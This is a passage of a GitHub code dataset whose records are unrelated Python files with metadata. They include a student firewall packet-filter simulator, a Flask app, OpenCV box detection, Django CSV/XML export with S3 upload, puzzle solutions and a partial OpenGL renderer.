。\n成都今天阴转小雨,无持续风向,最高气温:18℃,最低气温:14℃,注意保暖哦。\n\n[1] 我 想 问 有 关于 周杰伦 的 新闻 吗 ?\n当然有啦。18日,周杰伦发布了新歌《等你下课》,勾起了大家对青春的回忆。除了周杰伦,你的青春日记里是否还有这些歌手?陈奕迅所长张惠妹aMEI_feat_阿密特刘若英梁静茹孙燕姿五月天王力宏……你还记得那些骑车上学听歌的岁月吗?\n\"\"\"\n","repo_name":"apple55bc/bd-chat-2020","sub_path":"code/score_fn.py","file_name":"score_fn.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"zh","doc_type":"code","stars":52,"dataset":"github-code","pt":"72"} +{"seq_id":"71422109353","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\nurl = \"http://python123.io/ws/demo.html\"\ndemo = requests.get(url).text\nsoup = BeautifulSoup(demo, \"html.parser\")\n#print(soup.title)\n#print(soup.a)\n#print(soup.prettify())\n\nfor link in soup.find_all('a'):\n print(link.get('href'))\n\nf = soup.find_all(string = re.compile(\"python\"))\nprint(f)","repo_name":"XiaoQiSAMA/PythonReptile","sub_path":"bs4_demo.py","file_name":"bs4_demo.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13072118866","text":"#!/usr/bin/env python3\n\n\"\"\"Contains a function that concatenates two arrays \"\"\"\n\n\ndef cat_arrays(arr1, arr2):\n \"\"\" concat two arrays element-wise \"\"\"\n result = []\n result.extend(arr1)\n result.extend(arr2)\n return result\n","repo_name":"SravanthiSinha/holbertonschool-machine_learning","sub_path":"math/0x00-linear_algebra/6-howdy_partner.py","file_name":"6-howdy_partner.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11945858722","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom flask import Flask, session, redirect, request\n\nfrom views.login import login\nfrom views.login import logout\nfrom views.login import index\nfrom views.banks import banks\nfrom views.monitor import monitor\n\nimport locale\nlocale.setlocale(locale.LC_ALL, '')\n\n\napp = Flask(__name__)\napp.config.from_object('config')\napp.register_blueprint(login)\napp.register_blueprint(logout)\napp.register_blueprint(index)\napp.register_blueprint(banks)\napp.register_blueprint(monitor)\n\n@app.route(\"/index/sw\")\ndef sw():\n if 'username' not in session:\n return redirect('/login') \n\n if 'theme' not in session:\n session['theme']='b'\n else:\n if session['theme'] == 'a':\n session['theme'] = 'b'\n else:\n session['theme'] = 'a'\n return redirect('/')\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0')\n\n","repo_name":"neurotoxin78/1cxml","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42386070982","text":"# Authors: Rumen Kasabov, Michael Radke\n#\n# Firewall program that takes in a configuration file containing rules and filters out packets based on those rules.\n#\n\n\nimport sys\nimport os.path\n\n\n# Reads the configuration file\ndef get_configuration(config_file):\n\n configuration_lines = []\n rules = []\n binary_address = \"\"\n\n # Default minimum for an ip is 32 bits of 0s\n min_ip = \"\".ljust(32, \"0\")\n\n # Max is 255 for each 8 bits indicated by 32 1's\n max_ip = \"\".ljust(32, \"1\")\n\n # Open file and read lines making sure to get rid of comments, whitespaces, tabs, etc.\n with open(config_file) as file:\n\n for line in file:\n\n # Make sure the line is not blank\n if line.isspace():\n configuration_lines.append(\" \")\n else:\n configuration_rule = line.strip()\n\n configuration_lines.append(configuration_rule)\n\n file.close()\n\n counter = 0\n\n # Loop through config rules and create an array containing a dictionary for each of the 4 or 5 rules for each line\n while counter < len(configuration_lines):\n\n # Add an empty dictionary when there is a blank line or comment to keep track of lines\n if configuration_lines[counter].startswith(\"#\") or (configuration_lines[counter] == \" \"):\n rule_dictionary = {'direction': None , 'action': None, 'min-ip': None, 'max-ip': None,\n 'ports': None, 'flag': None}\n rules.append(rule_dictionary)\n\n else:\n line_rule = configuration_lines[counter]\n line_rule = line_rule.split()\n\n if not (len(line_rule) == 4 or len(line_rule) == 5):\n print(\"Error: line \" + str(counter) + \" contains an incorrect amount of rules\")\n quit()\n\n else:\n\n direction = line_rule[0]\n action = line_rule[1]\n ip_address = line_rule[2]\n ports = line_rule[3]\n\n # Split port numbers (if any)\n ports = ports.split(\",\")\n\n if len(line_rule) == 5:\n flag = line_rule[4]\n\n # Check if the flag is valid\n if flag != \"established\":\n print(\"Line number \" + str(counter + 1) + \" contains an invalid flag: \" + flag)\n quit()\n\n try:\n # Split ip address and routing prefix\n ip_address = ip_address.split(\"/\")\n\n # If a non wildcard address' length is 1 there is no routing prefix\n if len(ip_address) == 1:\n\n if ip_address[0] != \"*\":\n\n # Split each 8 bits of address\n ip_address[0] = ip_address[0].split(\".\")\n\n if len(ip_address[0]) == 4:\n\n for ip in ip_address[0]:\n\n # Check that each 8 bits of the address are within the correct range\n if int(ip) < 0 or int(ip) > 255:\n print(\"Invalid ip address range has been provided on line \" + str(counter + 1))\n quit()\n\n # Otherwise we convert each 8 bits of address into binary\n else:\n\n # The splice [2:] below gets rid of 0b created to indicate binary in python\n binary_address += str(bin(int(ip)))[2:].zfill(8)\n\n # Set the minimum and maximum values of the ip address\n # In this case, the min and max is the same because the routing prefix is all 32 bytes\n min_ip = binary_address\n max_ip = binary_address\n\n # Re-initialize to 0\n binary_address = \"\"\n\n else:\n print(\"Invalid ip address size provided on line \" + str(counter + 1))\n quit()\n\n # If a wildcard is used, we do not change the min and max values for an ip address\n elif ip_address[0] == \"*\":\n min_ip = \"\".ljust(32, '0')\n max_ip = \"\".ljust(32, '1')\n\n # Otherwise there is an routing prefix\n elif len(ip_address) == 2:\n\n routing_prefix = ip_address[1]\n\n # Check if the routing prefix is within correct range\n if int(routing_prefix) < 0 or int(routing_prefix) > 32:\n print(\"Invalid routing prefix provided on ip address on line \" + str(counter + 1))\n quit()\n\n else:\n\n # Split each 8 bits of address\n ip_address[0] = ip_address[0].split(\".\")\n\n if len(ip_address[0]) == 4:\n\n for ip in ip_address[0]:\n\n # Check that each 8 bits of the address are within the correct range\n if int(ip) < 0 or int(ip) > 255:\n print(\"Invalid ip address range has been provided on line \" + str(counter + 1))\n quit()\n\n # Otherwise we convert each 8 bits of address into binary\n else:\n\n # The splice [2:] below gets rid of 0b created to indicate binary in python\n binary_address += str(bin(int(ip)))[2:].zfill(8)\n\n # Set the minimum and maximum values for the 32 bit ip address based on the provided\n # routing prefix\n # min-ip will set everything after the leading bits in ip address to 0's (min value)\n # based on the prefix\n min_ip = binary_address[:int(routing_prefix)].ljust(32, '0')\n\n # max-ip will set everything after the leadings bits in ip address to 1's (max value)\n # based on the prefix\n max_ip = binary_address[:int(routing_prefix)].ljust(32, '1')\n\n binary_address = \"\"\n\n\n else:\n print(\"Invalid ip address size provided on line \" + str(counter + 1))\n quit()\n\n except Exception as e:\n print(\"Invalid ip address number on line \" + str(counter + 1))\n print(e)\n quit()\n\n if not (direction == \"in\" or direction == \"out\"):\n\n print(\"Line number \" + str(counter + 1) + \" contains an invalid direction: \" + direction)\n quit()\n\n elif not (action == \"accept\" or action == \"drop\" or action == \"reject\"):\n\n print(\"Line number \" + str(counter + 1) + \" contains an invalid action: \" + action)\n quit()\n\n # Try catch block in case configuration file has a non-integer provided as a port rule\n try:\n\n for port in ports:\n\n # Check for wildcard\n if port == \"*\":\n pass\n\n # Check for valid port range\n elif int(port) < 0 or int(port) > 65535:\n\n print(\"Line number \" + str(counter + 1) + \" contains an invalid port range: \" + ports)\n quit()\n\n except Exception as e:\n\n print(\"Invalid port number on line \" + str(counter + 1))\n print(e)\n quit()\n\n if len(line_rule) == 5:\n\n flag_boolean = \"1\"\n rule_dictionary = {'direction': direction, 'action': action, 'min-ip': min_ip, 'max-ip': max_ip,\n 'ports': ports, 'flag': flag_boolean}\n\n else:\n rule_dictionary = {'direction': direction, 'action': action, 'min-ip': min_ip, 'max-ip': max_ip,\n 'ports': ports, 'flag': None}\n\n # Put dictionary in rules array\n rules.append(rule_dictionary)\n\n counter += 1\n\n return rules\n\n\ndef get_packets():\n\n packets = []\n binary_address = \"\"\n decimal_address = \"\"\n\n # Take count on the current line/packet we are reading from STDIN\n counter = 1\n\n # Read STDIN line by line, appending each packet in each line to an array\n for line in sys.stdin.readlines():\n\n packet = line.strip()\n\n # Split each field into elements in an array\n packet = packet.split()\n\n # Check if packet contains the valid number of fields\n if len(packet) != 4:\n print(\"Packet number \" + str(counter) + \" contains an invalid number of fields.\")\n quit()\n\n direction = packet[0]\n ip_address = packet[1]\n decimal_address = ip_address\n port = packet[2]\n flag = packet[3]\n\n # Check if direction is valid\n if not (direction == \"in\" or direction == \"out\"):\n\n print(\"Packet number \" + str(counter) + \" contains an invalid direction.\" + direction)\n quit()\n\n try:\n\n # Split each 8 bits in the ip address into array elements\n ip_address = ip_address.split(\".\")\n\n if len(ip_address) != 4:\n print(\"Packet number \" + str(counter) + \" contains an invalid ip address size.\")\n quit()\n\n for ip in ip_address:\n\n # Check that each 8 bits of the address are within the correct range\n if int(ip) < 0 or int(ip) > 255:\n print(\"Packet number \" + str(counter) + \" contains an invalid ip address range: \" + ip)\n quit()\n\n # Otherwise we convert each 8 bits of address into binary\n else:\n\n # The splice [2:] below gets rid of 0b created to indicate binary in python\n binary_address += str(bin(int(ip)))[2:].zfill(8)\n\n # Check for valid port range\n if int(port) < 0 or int(port) > 65535:\n\n print(\"Packet number \" + str(counter) + \" contains an invalid port range: \" + port)\n quit()\n\n # If the flag given is not 0 or 1 we indicate an error.\n if not (flag == \"0\" or flag == \"1\"):\n\n print(\"Packet number \" + str(counter) + \" contains an invalid flag: \" + flag)\n quit()\n\n\n except Exception as e:\n print(\"Invalid packet format has been received on line \" + str(counter))\n print(e)\n quit()\n\n packet_dictionary = {'direction': direction, 'decimal-address': decimal_address, 'ip_address': binary_address,\n 'port': port, 'flag': flag}\n\n packets.append(packet_dictionary)\n\n # Clear binary address and increment counter\n binary_address = \"\"\n counter += 1\n\n return packets\n\n\n# Filter the incoming and outgoing packets based on the established firewall rules\ndef filter_packets(rules, packets):\n\n # Check if any of the rules apply for each packet\n for packet in packets:\n\n rule_line_number = 0\n\n for rule in rules:\n\n # Check if the rule matches up to any of the packets and print output based on that match\n if rule['direction'] == packet['direction']:\n\n matching_port = False\n\n # Check if there is a matching port for the packet\n for port in rule['ports']:\n\n if port == \"*\" or port == packet['port']:\n\n matching_port = True\n\n # If port matches we check the ip range and any flags\n if matching_port is True:\n\n min_ip = rule['min-ip']\n max_ip = rule['max-ip']\n packet_address = packet['ip_address']\n\n # Convert binary strings of addresses to an integer\n min_ip = int(min_ip, 2)\n max_ip = int(max_ip, 2)\n packet_address = int(packet_address, 2)\n\n # If the packet address is within the correct rule range for the current rule\n # we check the flag and print output\n if packet_address >= min_ip and packet_address <= max_ip:\n\n if rule['flag'] == \"1\" and packet['flag'] == \"1\":\n\n print(rule['action'] + \"(\" + str(rule_line_number + 1) + \") \" + packet['direction'] + \" \"\n + packet['decimal-address'] + \" \" + packet['port'] + \" \" + packet['flag'])\n\n break\n\n elif rule['flag'] is None:\n\n print(rule['action'] + \"(\" + str(rule_line_number + 1) + \") \" + packet['direction'] + \" \"\n + packet['decimal-address'] + \" \" + packet['port'] + \" \" + packet['flag'])\n\n break\n\n rule_line_number += 1\n\n # If the rule line exceeds the number of rules then there must not be a rule for that packet\n if rule_line_number >= len(rules):\n print(\"drop() \" + packet['direction'] + \" \"\n + packet['decimal-address'] + \" \" + packet['port'] + \" \" + packet['flag'])\n\n break\n\n\nif __name__ == \"__main__\":\n\n config_filename = sys.argv[1]\n\n # Check if the file exists in directory\n if os.path.isfile(config_filename):\n\n # Read in the configuration from the file\n rules = get_configuration(config_filename)\n\n # Get the packets\n packets = get_packets()\n\n # Filter the packets\n filter_packets(rules, packets)\n\n else:\n\n print(\"The file you have provided does not exist.\")","repo_name":"mradk331/CPSC-526-Firewall-simulator","sub_path":"fw.py","file_name":"fw.py","file_ext":"py","file_size_in_byte":14459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41507471160","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 4 18:43:55 2021\r\nRVD-minor: Project\r\nPackage detection \r\n\r\nMichael Koreneef\r\n18089127\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef bigcontour(contours):\r\n biggest = np.array([])\r\n max_area = 0\r\n for i in contours:\r\n area = cv2.contourArea(i)\r\n if area > 500:\r\n arclen = cv2.arcLength(i, True) \r\n approx = cv2.approxPolyDP(i, 0.02* arclen, True)\r\n print(approx)\r\n if area > max_area and len(approx) == 4:\r\n biggest = approx\r\n max_area = area\r\n return biggest, max_area\r\n\r\ndef reorder(points):\r\n points = points.reshape((4,2))\r\n pointsnew = np.zeros((4,1,2), dtype=np.int32)\r\n add = points.sum(1)\r\n \r\n pointsnew[0] = points[np.argmin(add)]\r\n pointsnew[3] = points[np.argmax(add)]\r\n diff = np.diff(points, axis=1)\r\n pointsnew[1] = points[np.argmin(diff)]\r\n pointsnew[2] = points[np.argmax(diff)]\r\n \r\n return pointsnew\r\n#image read\r\nimage = cv2.imread('package1.jpeg',20)\r\ncv2.imshow(\"Image\", image)\r\n\r\n# image to gray values\r\ngrayImage = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\ncv2.imshow(\"Gray image\", grayImage)\r\n\r\n# blurred image\r\nblurImage = cv2.medianBlur(grayImage,9)\r\ncv2.imshow(\"Blur image\", blurImage)\r\n\r\ncannyImage = cv2.Canny(blurImage,50,200)\r\ncv2.imshow(\"Canny image\", cannyImage)\r\n\r\nkernel = np.ones((3,3))\r\nimgDial = cv2.dilate(cannyImage,kernel,iterations=2)\r\nimgThre = cv2.erode(imgDial,kernel,iterations=1)\r\ncv2.imshow(\"dial image\", imgDial)\r\ncv2.imshow(\"erode image\", imgThre)\r\n\r\ncnts, hierarchy = cv2.findContours(imgThre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\ncontourImage = image.copy()\r\ncv2.drawContours(contourImage, cnts, -1, (0, 0, 255), 1, cv2.LINE_AA)\r\ncv2.imshow(\"contour image\", contourImage)\r\n\r\nbiggest, maxarea = bigcontour(cnts)\r\nprint(biggest, maxarea)\r\n\r\nif biggest.size !=0:\r\n biggestr = reorder(biggest)\r\n print(biggestr)\r\n \r\ncanvas = image.copy()\r\nM = cv2.moments(biggest) \r\ncx = int(M[\"m10\"] / M[\"m00\"])\r\ncy = int(M[\"m01\"] / M[\"m00\"])\r\ncv2.circle(canvas, (cx,cy), (1), (0, 255, 0),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[0][0][0],biggestr[0][0][1]), (1), (255, 0, 0),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[1][0][0],biggestr[1][0][1]), (1), (0, 255, 0),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[2][0][0],biggestr[2][0][1]), (1), (0, 0, 255),3) #tekenen middelpunt\r\ncv2.circle(canvas, (biggestr[3][0][0],biggestr[3][0][1]), (1), (255, 255, 0),3) #tekenen middelpunt\r\n\r\ncv2.imshow(\"detected\", canvas)\r\n\r\n#depth calculations\r\nw = 8.7 #width in cm\r\nw1 = biggestr[1][0][0] - biggestr[0][0][0]\r\nw2 = biggestr[3][0][0] - biggestr[2][0][0]\r\nl1 = biggestr[2][0][1] - biggestr[0][0][1]\r\nl2 = biggestr[3][0][1] - biggestr[1][0][1]\r\nl = (l1 + l2)/2\r\npixelw1 = w/w1\r\npixelw2 = w/w2\r\npixell1 = pixelw1 * l\r\npixell2 = pixelw2 * l\r\ngeml = (pixell1 + pixell2)/2\r\ncenterg = geml/2\r\n\r\nprint(pixelw1, pixelw2)\r\nprint(pixell1, pixell2)\r\nprint(geml, centerg)\r\n# destroy the windows by press any key.\r\nkey = cv2.waitKey(0) \r\ncv2.destroyAllWindows()","repo_name":"HHS-RVD-PV/realsense-phonebox-detection","sub_path":"package_detection.py","file_name":"package_detection.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31430190562","text":"\"\"\"\nReporting tool utils\n\"\"\"\n\n\nimport csv\nimport uuid\nfrom abc import abstractmethod\nfrom typing import Any, Iterable, Optional\n\nimport boto3\nimport dicttoxml\nfrom botocore.client import BaseClient\nfrom botocore.config import Config\nfrom django.conf import settings\nfrom django.core.files.base import ContentFile\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework.serializers import Serializer\n\nfrom shared.models import User\n\n\nclass DictWriter(csv.DictWriter):\n \"\"\"\n Deals with custom header labels\n \"\"\"\n def __init__(self, f, fieldnames, restval=\"\", extrasaction=\"raise\",\n dialect=\"excel\", header: Optional[Iterable[str]] = None,\n *args, **kwds):\n super().__init__(f, fieldnames, restval, extrasaction, dialect, *args,\n **kwds)\n\n self._header = header\n\n def writeheader(self) -> Any:\n if self._header:\n header = dict(zip(self.fieldnames, self._header))\n return self.writerow(header)\n\n return super().writeheader()\n\n\nclass RelevantDataFileGenerator:\n \"\"\"\n Generates diverse file from serializer data\n \"\"\"\n FORMAT_XML = 'xml'\n FORMAT_CSV = 'csv'\n\n def __init__(self, serializer: Serializer, export_format: str):\n \"\"\"\n :type serializer: Serializer\n :type export_format: str\n \"\"\"\n self.export_format = export_format\n self._serializer = serializer\n\n @abstractmethod\n def __str__(self) -> str:\n \"\"\"\n Returns generated data as string\n\n :rtype: str\n \"\"\"\n\n @staticmethod\n def instantiate(extension: str,\n serializer: Serializer) -> 'RelevantDataFileGenerator':\n \"\"\"\n :type extension: str\n :type serializer: Serializer\n\n :rtype: RelevantDataFileGenerator\n \"\"\"\n if extension == RelevantDataFileGenerator.FORMAT_XML:\n cls = XMLRelevantDataFileGenerator\n elif extension == RelevantDataFileGenerator.FORMAT_CSV:\n cls = CSVRelevantDataFileGenerator\n\n return cls(serializer, extension)\n\n\nclass CSVRelevantDataFileGenerator(RelevantDataFileGenerator):\n \"\"\"\n Generates csv from serializer data\n \"\"\"\n COLUMNS_MAP = {\n 'id': _('ID'),\n 'sensor_GPS_lat': _('GPS Latitude'),\n 'sensor_GPS_long': _('GPS Longitude'),\n 'location_x': _('Location X'),\n 'location_y': _('Location Y'),\n 'location_z': _('Location Z'),\n 'orient_theta': _('Orient theta'),\n 'orient_phi': _('Orient phi'),\n 'timestamp': _('Time stamp'),\n 'project_name': _('Project name'),\n 'sensor_id': _('Sensor ID'),\n 'license_plate_number': _('Vehicle registration plate'),\n 'event_object': _('Object Type'),\n 'object_class': _('Object class'),\n 'vehicle_classification': _('Vehicle classification'),\n 'ambient_weather': _('Ambient weather condition'),\n 'road_weather': _('Road weather'),\n 'stopped_vehicle_detection': _('Stopped vehicle detection'),\n 'tagged_data': _('Tagged data'),\n 'is_tagged_data': _('Is tagged data'),\n 'license_plate_location': _('License plate location'),\n 'face_location': _('Face location'),\n 'cad_file_tag': _('CAD file tag'),\n 'road_temperature': _('Road temperature'),\n 'ambient_temperature': _('Ambient temperature'),\n 'pedestrian_flow_transit_method': _('Pedestrian Flow Transit Method'),\n 'pedestrian_flow_number_of_objects': _('Pedestrian Flow '\n 'Number Of Objects'),\n 'traffic_flow_number_of_objects': _('Number of objects'),\n 'traffic_flow_observation_end_dt': _('Observation end'),\n 'traffic_flow_observation_start_dt': _('Observation start'),\n 'traffic_flow_number_of_directions': _('Number of directions'),\n 'traffic_flow_directions_statistics': _('Directions statistics')\n }\n\n def __init__(self, serializer: 'RelevantDataGeneratorSeriralizer',\n export_format: str):\n \"\"\"\n :type serializer: RelevantDataGeneratorSeriralizer\n :type export_format: str\n \"\"\"\n super().__init__(serializer, export_format)\n\n self.__file = ContentFile('')\n\n def through(self):\n \"\"\"\n Puts rows to csv file row by row\n \"\"\"\n csv_writer = DictWriter(\n f=self.__file,\n fieldnames=self._serializer.child.Meta.fields,\n header=self.header\n )\n csv_writer.writeheader()\n\n for rd_item in self._serializer.data:\n csv_writer.writerow(rd_item)\n\n def __str__(self):\n self.through()\n\n return self.__file.open('r').file.getvalue()\n\n @property\n def header(self) -> Iterable[str]:\n \"\"\"\n Return header labels\n\n :rtype: Iterable[str]\n \"\"\"\n columns_map = getattr(self, 'COLUMNS_MAP')\n\n if columns_map:\n return [\n columns_map.get(field, field)\n for field\n in self._serializer.child.Meta.fields\n ]\n\n return self._serializer.child.Meta.fields\n\n\nclass XMLRelevantDataFileGenerator(RelevantDataFileGenerator):\n \"\"\"\n Generates xml from serializer data\n \"\"\"\n def __str__(self) -> str:\n return dicttoxml.dicttoxml(self._serializer.data).decode(\"utf-8\")\n\n\nclass S3FileUploader:\n \"\"\"\n Uploads file to s3\n \"\"\"\n\n def __init__(self, file, **kwargs):\n \"\"\"\n :param file:\n :type user: User\n \"\"\"\n self._file = file\n self.__key = None\n self.__s3 = None\n\n @property\n def key(self) -> str:\n \"\"\"\n Generates remote storage file key\n\n :rtype: str\n \"\"\"\n if self.__key is None:\n self.__key = self.generate_key()\n\n return self.__key\n\n @abstractmethod\n def generate_key(self) -> str:\n \"\"\"\n Generates obj key\n\n :rtype: str\n \"\"\"\n\n def upload_and_get_link(self) -> str:\n \"\"\"\n Uploads file and returns the link to it\n\n :rtype: int\n \"\"\"\n self.upload()\n\n return self.url\n\n def upload(self) -> dict:\n \"\"\"\n Uploads file\n\n :rtype: dict\n \"\"\"\n return self.s3_client.put_object(\n Body=str(self._file),\n Bucket=settings.AWS_CLIENT_PORTAL_BUCKET,\n Key=self.key\n )\n\n @property\n def url(self) -> str:\n \"\"\"\n Uploaded file url\n\n :rtype: str\n \"\"\"\n return self.s3_client.generate_presigned_url(\n 'get_object',\n Params={\n 'Bucket': settings.AWS_CLIENT_PORTAL_BUCKET,\n 'Key': self.key\n },\n ExpiresIn=3600 * 24\n )\n\n @property\n def s3_client(self) -> BaseClient:\n \"\"\"\n Connection to S3 bucket\n\n :rtype: BaseClient\n \"\"\"\n if self.__s3 is None:\n self.__s3 = boto3.client(\n 's3',\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,\n config=Config(signature_version='s3v4')\n )\n\n return self.__s3\n\n\nclass RelvantDataExportUploader(S3FileUploader):\n \"\"\"\n Relevant data file uplodaer\n \"\"\"\n def __init__(self, file: RelevantDataFileGenerator, user: User):\n super().__init__(file)\n\n self.__user = user\n\n def generate_key(self) -> str:\n return 'relevant_data/organization_{}/{}.{}'.format(\n self.__user.organization.id,\n uuid.uuid4().hex,\n self._file.export_format\n )\n\n\nclass FeatureRequestUploader(S3FileUploader):\n \"\"\"\n Feature request file uplodaer\n \"\"\"\n def __init__(self, file: ContentFile, upload_key: str,\n organization_id: int):\n super().__init__(file)\n\n self.__upload_key = upload_key\n self.__organization_id = organization_id\n\n def generate_key(self) -> str:\n return '{}/organization_{}/{}'.format(\n self.__upload_key,\n self.__organization_id,\n self._file.name\n )\n","repo_name":"ReconAI/ClientPortal","sub_path":"client_portal/reporting_tool/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1642443186","text":"from aocd import get_data\nfrom ..utils.aoctimer import aoctimer\n\n\ndef characters_processed(data: str, window_size: int) -> int:\n for i in range(window_size - 1, len(data)):\n sequence = data[i - window_size + 1 : i + 1]\n if len(set(sequence)) == len(sequence):\n return i + 1\n\n\n@aoctimer\ndef part_a(data):\n return characters_processed(data, 4)\n\n\n@aoctimer\ndef part_b(data):\n return characters_processed(data, 14)\n\n\ntest_data_1 = \"mjqjpqmgbljsphdztnvjfqwrcgsmlb\"\ntest_data_2 = \"bvwbjplbgvbhsrlpgdmjqwftvncz\"\ntest_data_3 = \"nppdvjthqldpwncqszvftbrmjlhg\"\ntest_data_4 = \"nznrnfrfntjfmvfwmzdfjlvtqnbhcprsg\"\ntest_data_5 = \"zcfzfwzzqfrljwzlrfnpqdbhtmscgvjw\"\n\nif __name__ == \"__main__\":\n assert part_a(test_data_1) == 7\n assert part_a(test_data_2) == 5\n assert part_a(test_data_3) == 6\n assert part_a(test_data_4) == 10\n assert part_a(test_data_5) == 11\n assert part_b(test_data_1) == 19\n assert part_b(test_data_2) == 23\n assert part_b(test_data_3) == 23\n assert part_b(test_data_4) == 29\n assert part_b(test_data_5) == 26\n\n data = get_data(day=6, year=2022)\n print(part_a(data))\n print(part_b(data))\n","repo_name":"aglorei/aoc2022-py","sub_path":"src/day06/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26706338050","text":"from sys import stdin\r\n\r\nA, B = [int(data) for data in stdin.readlines()]\r\n\r\ntotal = A * B\r\n\r\nremains = []\r\n\r\nwhile B >= 10:\r\n B, remain = divmod(B, 10)\r\n remains.append(remain)\r\n\r\nremains.append(B)\r\n\r\nfor remain in remains:\r\n print(remain * A)\r\n\r\nprint(total)","repo_name":"Melting-Face/baekjoon","sub_path":"백준/Bronze/2588. 곱셈/곱셈.py","file_name":"곱셈.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16245721597","text":"\"\"\"Find Loop length in singly linked list.\"\"\"\nfrom collections import defaultdict\n\n\nclass Node:\n def __init__(self, data: int) -> None:\n self.data = data\n self.next = None\n\n\nclass SingleLinkedList:\n def __init__(self) -> None:\n self.head: Node = None\n self.tail: Node = None\n\n def print_list(self) -> None:\n cur: Node = self.head\n while cur:\n print(cur.data, end=\"->\")\n cur = cur.next\n print(\"Null\")\n\n\ndef loop_length(head: Node) -> int:\n # Brute force solution\n if head is None:\n return 0\n temp: Node = head\n hsh = defaultdict(int)\n t: int = 1\n while temp:\n if hsh[temp]:\n lenght: int = t - hsh[temp]\n return lenght\n hsh[temp] = t\n t += 1\n temp = temp.next\n\n return 0\n\n\ndef find_length(slow: Node, fast: Node) -> int:\n cnt: int = 1\n fast = fast.next\n while slow != fast:\n cnt += 1\n fast = fast.next\n\n return cnt\n\n\ndef loop_length_optimal(head: Node) -> Node:\n slow: Node = head\n fast: Node = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n\n if slow == fast:\n return find_length(slow=slow, fast=fast)\n\n return 0\n\n\nif __name__ == \"__main__\":\n llist: SingleLinkedList = SingleLinkedList()\n print(llist.head)\n node1: Node = Node(1)\n node2: Node = Node(2)\n node3: Node = Node(3)\n node4: Node = Node(4)\n node5: Node = Node(5)\n node6: Node = Node(6)\n node7: Node = Node(7)\n node8: Node = Node(8)\n node9: Node = Node(9)\n node1.next = node2\n node2.next = node3\n node3.next = node4\n node4.next = node5\n node5.next = node6\n node6.next = node7\n node7.next = node8\n node8.next = node9\n llist.head = node1\n node9.next = node3\n # llist.print_list()\n print(loop_length(head=llist.head))\n print(loop_length_optimal(head=llist.head))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/linked_list/loop_length_in_sll.py","file_name":"loop_length_in_sll.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16223467227","text":"import ctypes\nimport numpy as np\nimport weakref\nimport os\n\n_USE_EGL_OFFSCREEN = False\nif 'MESHRENDER_EGL_OFFSCREEN' in os.environ:\n os.environ['PYOPENGL_PLATFORM'] = 'egl'\n _USE_EGL_OFFSCREEN = True\n\ntry:\n import OpenGL\n from OpenGL.GL import *\n from OpenGL.GL import shaders\n from OpenGL.arrays import *\nexcept Exception:\n import logging\n logging.warning('Cannot import OpenGL -- rendering will be broken!')\n\nfrom .constants import MAX_N_LIGHTS\nfrom .light import AmbientLight, PointLight, DirectionalLight\nfrom .shaders import vertex_shader, fragment_shader, depth_vertex_shader, depth_fragment_shader\nfrom .scene_object import InstancedSceneObject\n\n# Create static c_void_p objects to avoid leaking memory\nC_VOID_PS = []\nfor i in range(5):\n C_VOID_PS.append(ctypes.c_void_p(4*4*i))\n\nclass OpenGLRenderer(object):\n \"\"\"An OpenGL 3.0+ renderer, based on PyOpenGL.\n \"\"\"\n\n def __init__(self, scene):\n \"\"\"Initialize a renderer for a given scene.\n\n Parameters\n ----------\n scene : Scene\n A scene description.\n \"\"\"\n self.scene = scene\n self._width = self.scene.camera.intrinsics.width\n self._height = self.scene.camera.intrinsics.height\n self._vaids = None\n self._colorbuf, self._depthbuf = None, None\n self._framebuf = None\n\n # Initialize the OpenGL context\n self._init_gl_context()\n\n # Bind the frame buffer for offscreen rendering\n self._bind_frame_buffer()\n\n # Use the depth test functionality of OpenGL. Don't clip -- many normals may be backwards.\n glEnable(GL_DEPTH_TEST)\n glDepthMask(GL_TRUE)\n glDepthFunc(GL_LESS)\n glDepthRange(0.0, 1.0)\n\n # Load the meshes into VAO's\n self._buffers = None\n self._vaids = self._load_meshes()\n\n # Load the shaders\n # Fix for pyopengl -- bind a framebuffer\n glBindVertexArray(self._vaids[0])\n self._full_shader = self._load_shaders(vertex_shader, fragment_shader)\n self._depth_shader = self._load_shaders(depth_vertex_shader, depth_fragment_shader)\n glBindVertexArray(0)\n\n\n def _init_gl_context(self):\n if _USE_EGL_OFFSCREEN:\n self._init_egl()\n else:\n self._init_pyglet()\n\n\n def _make_gl_context_current(self):\n if not 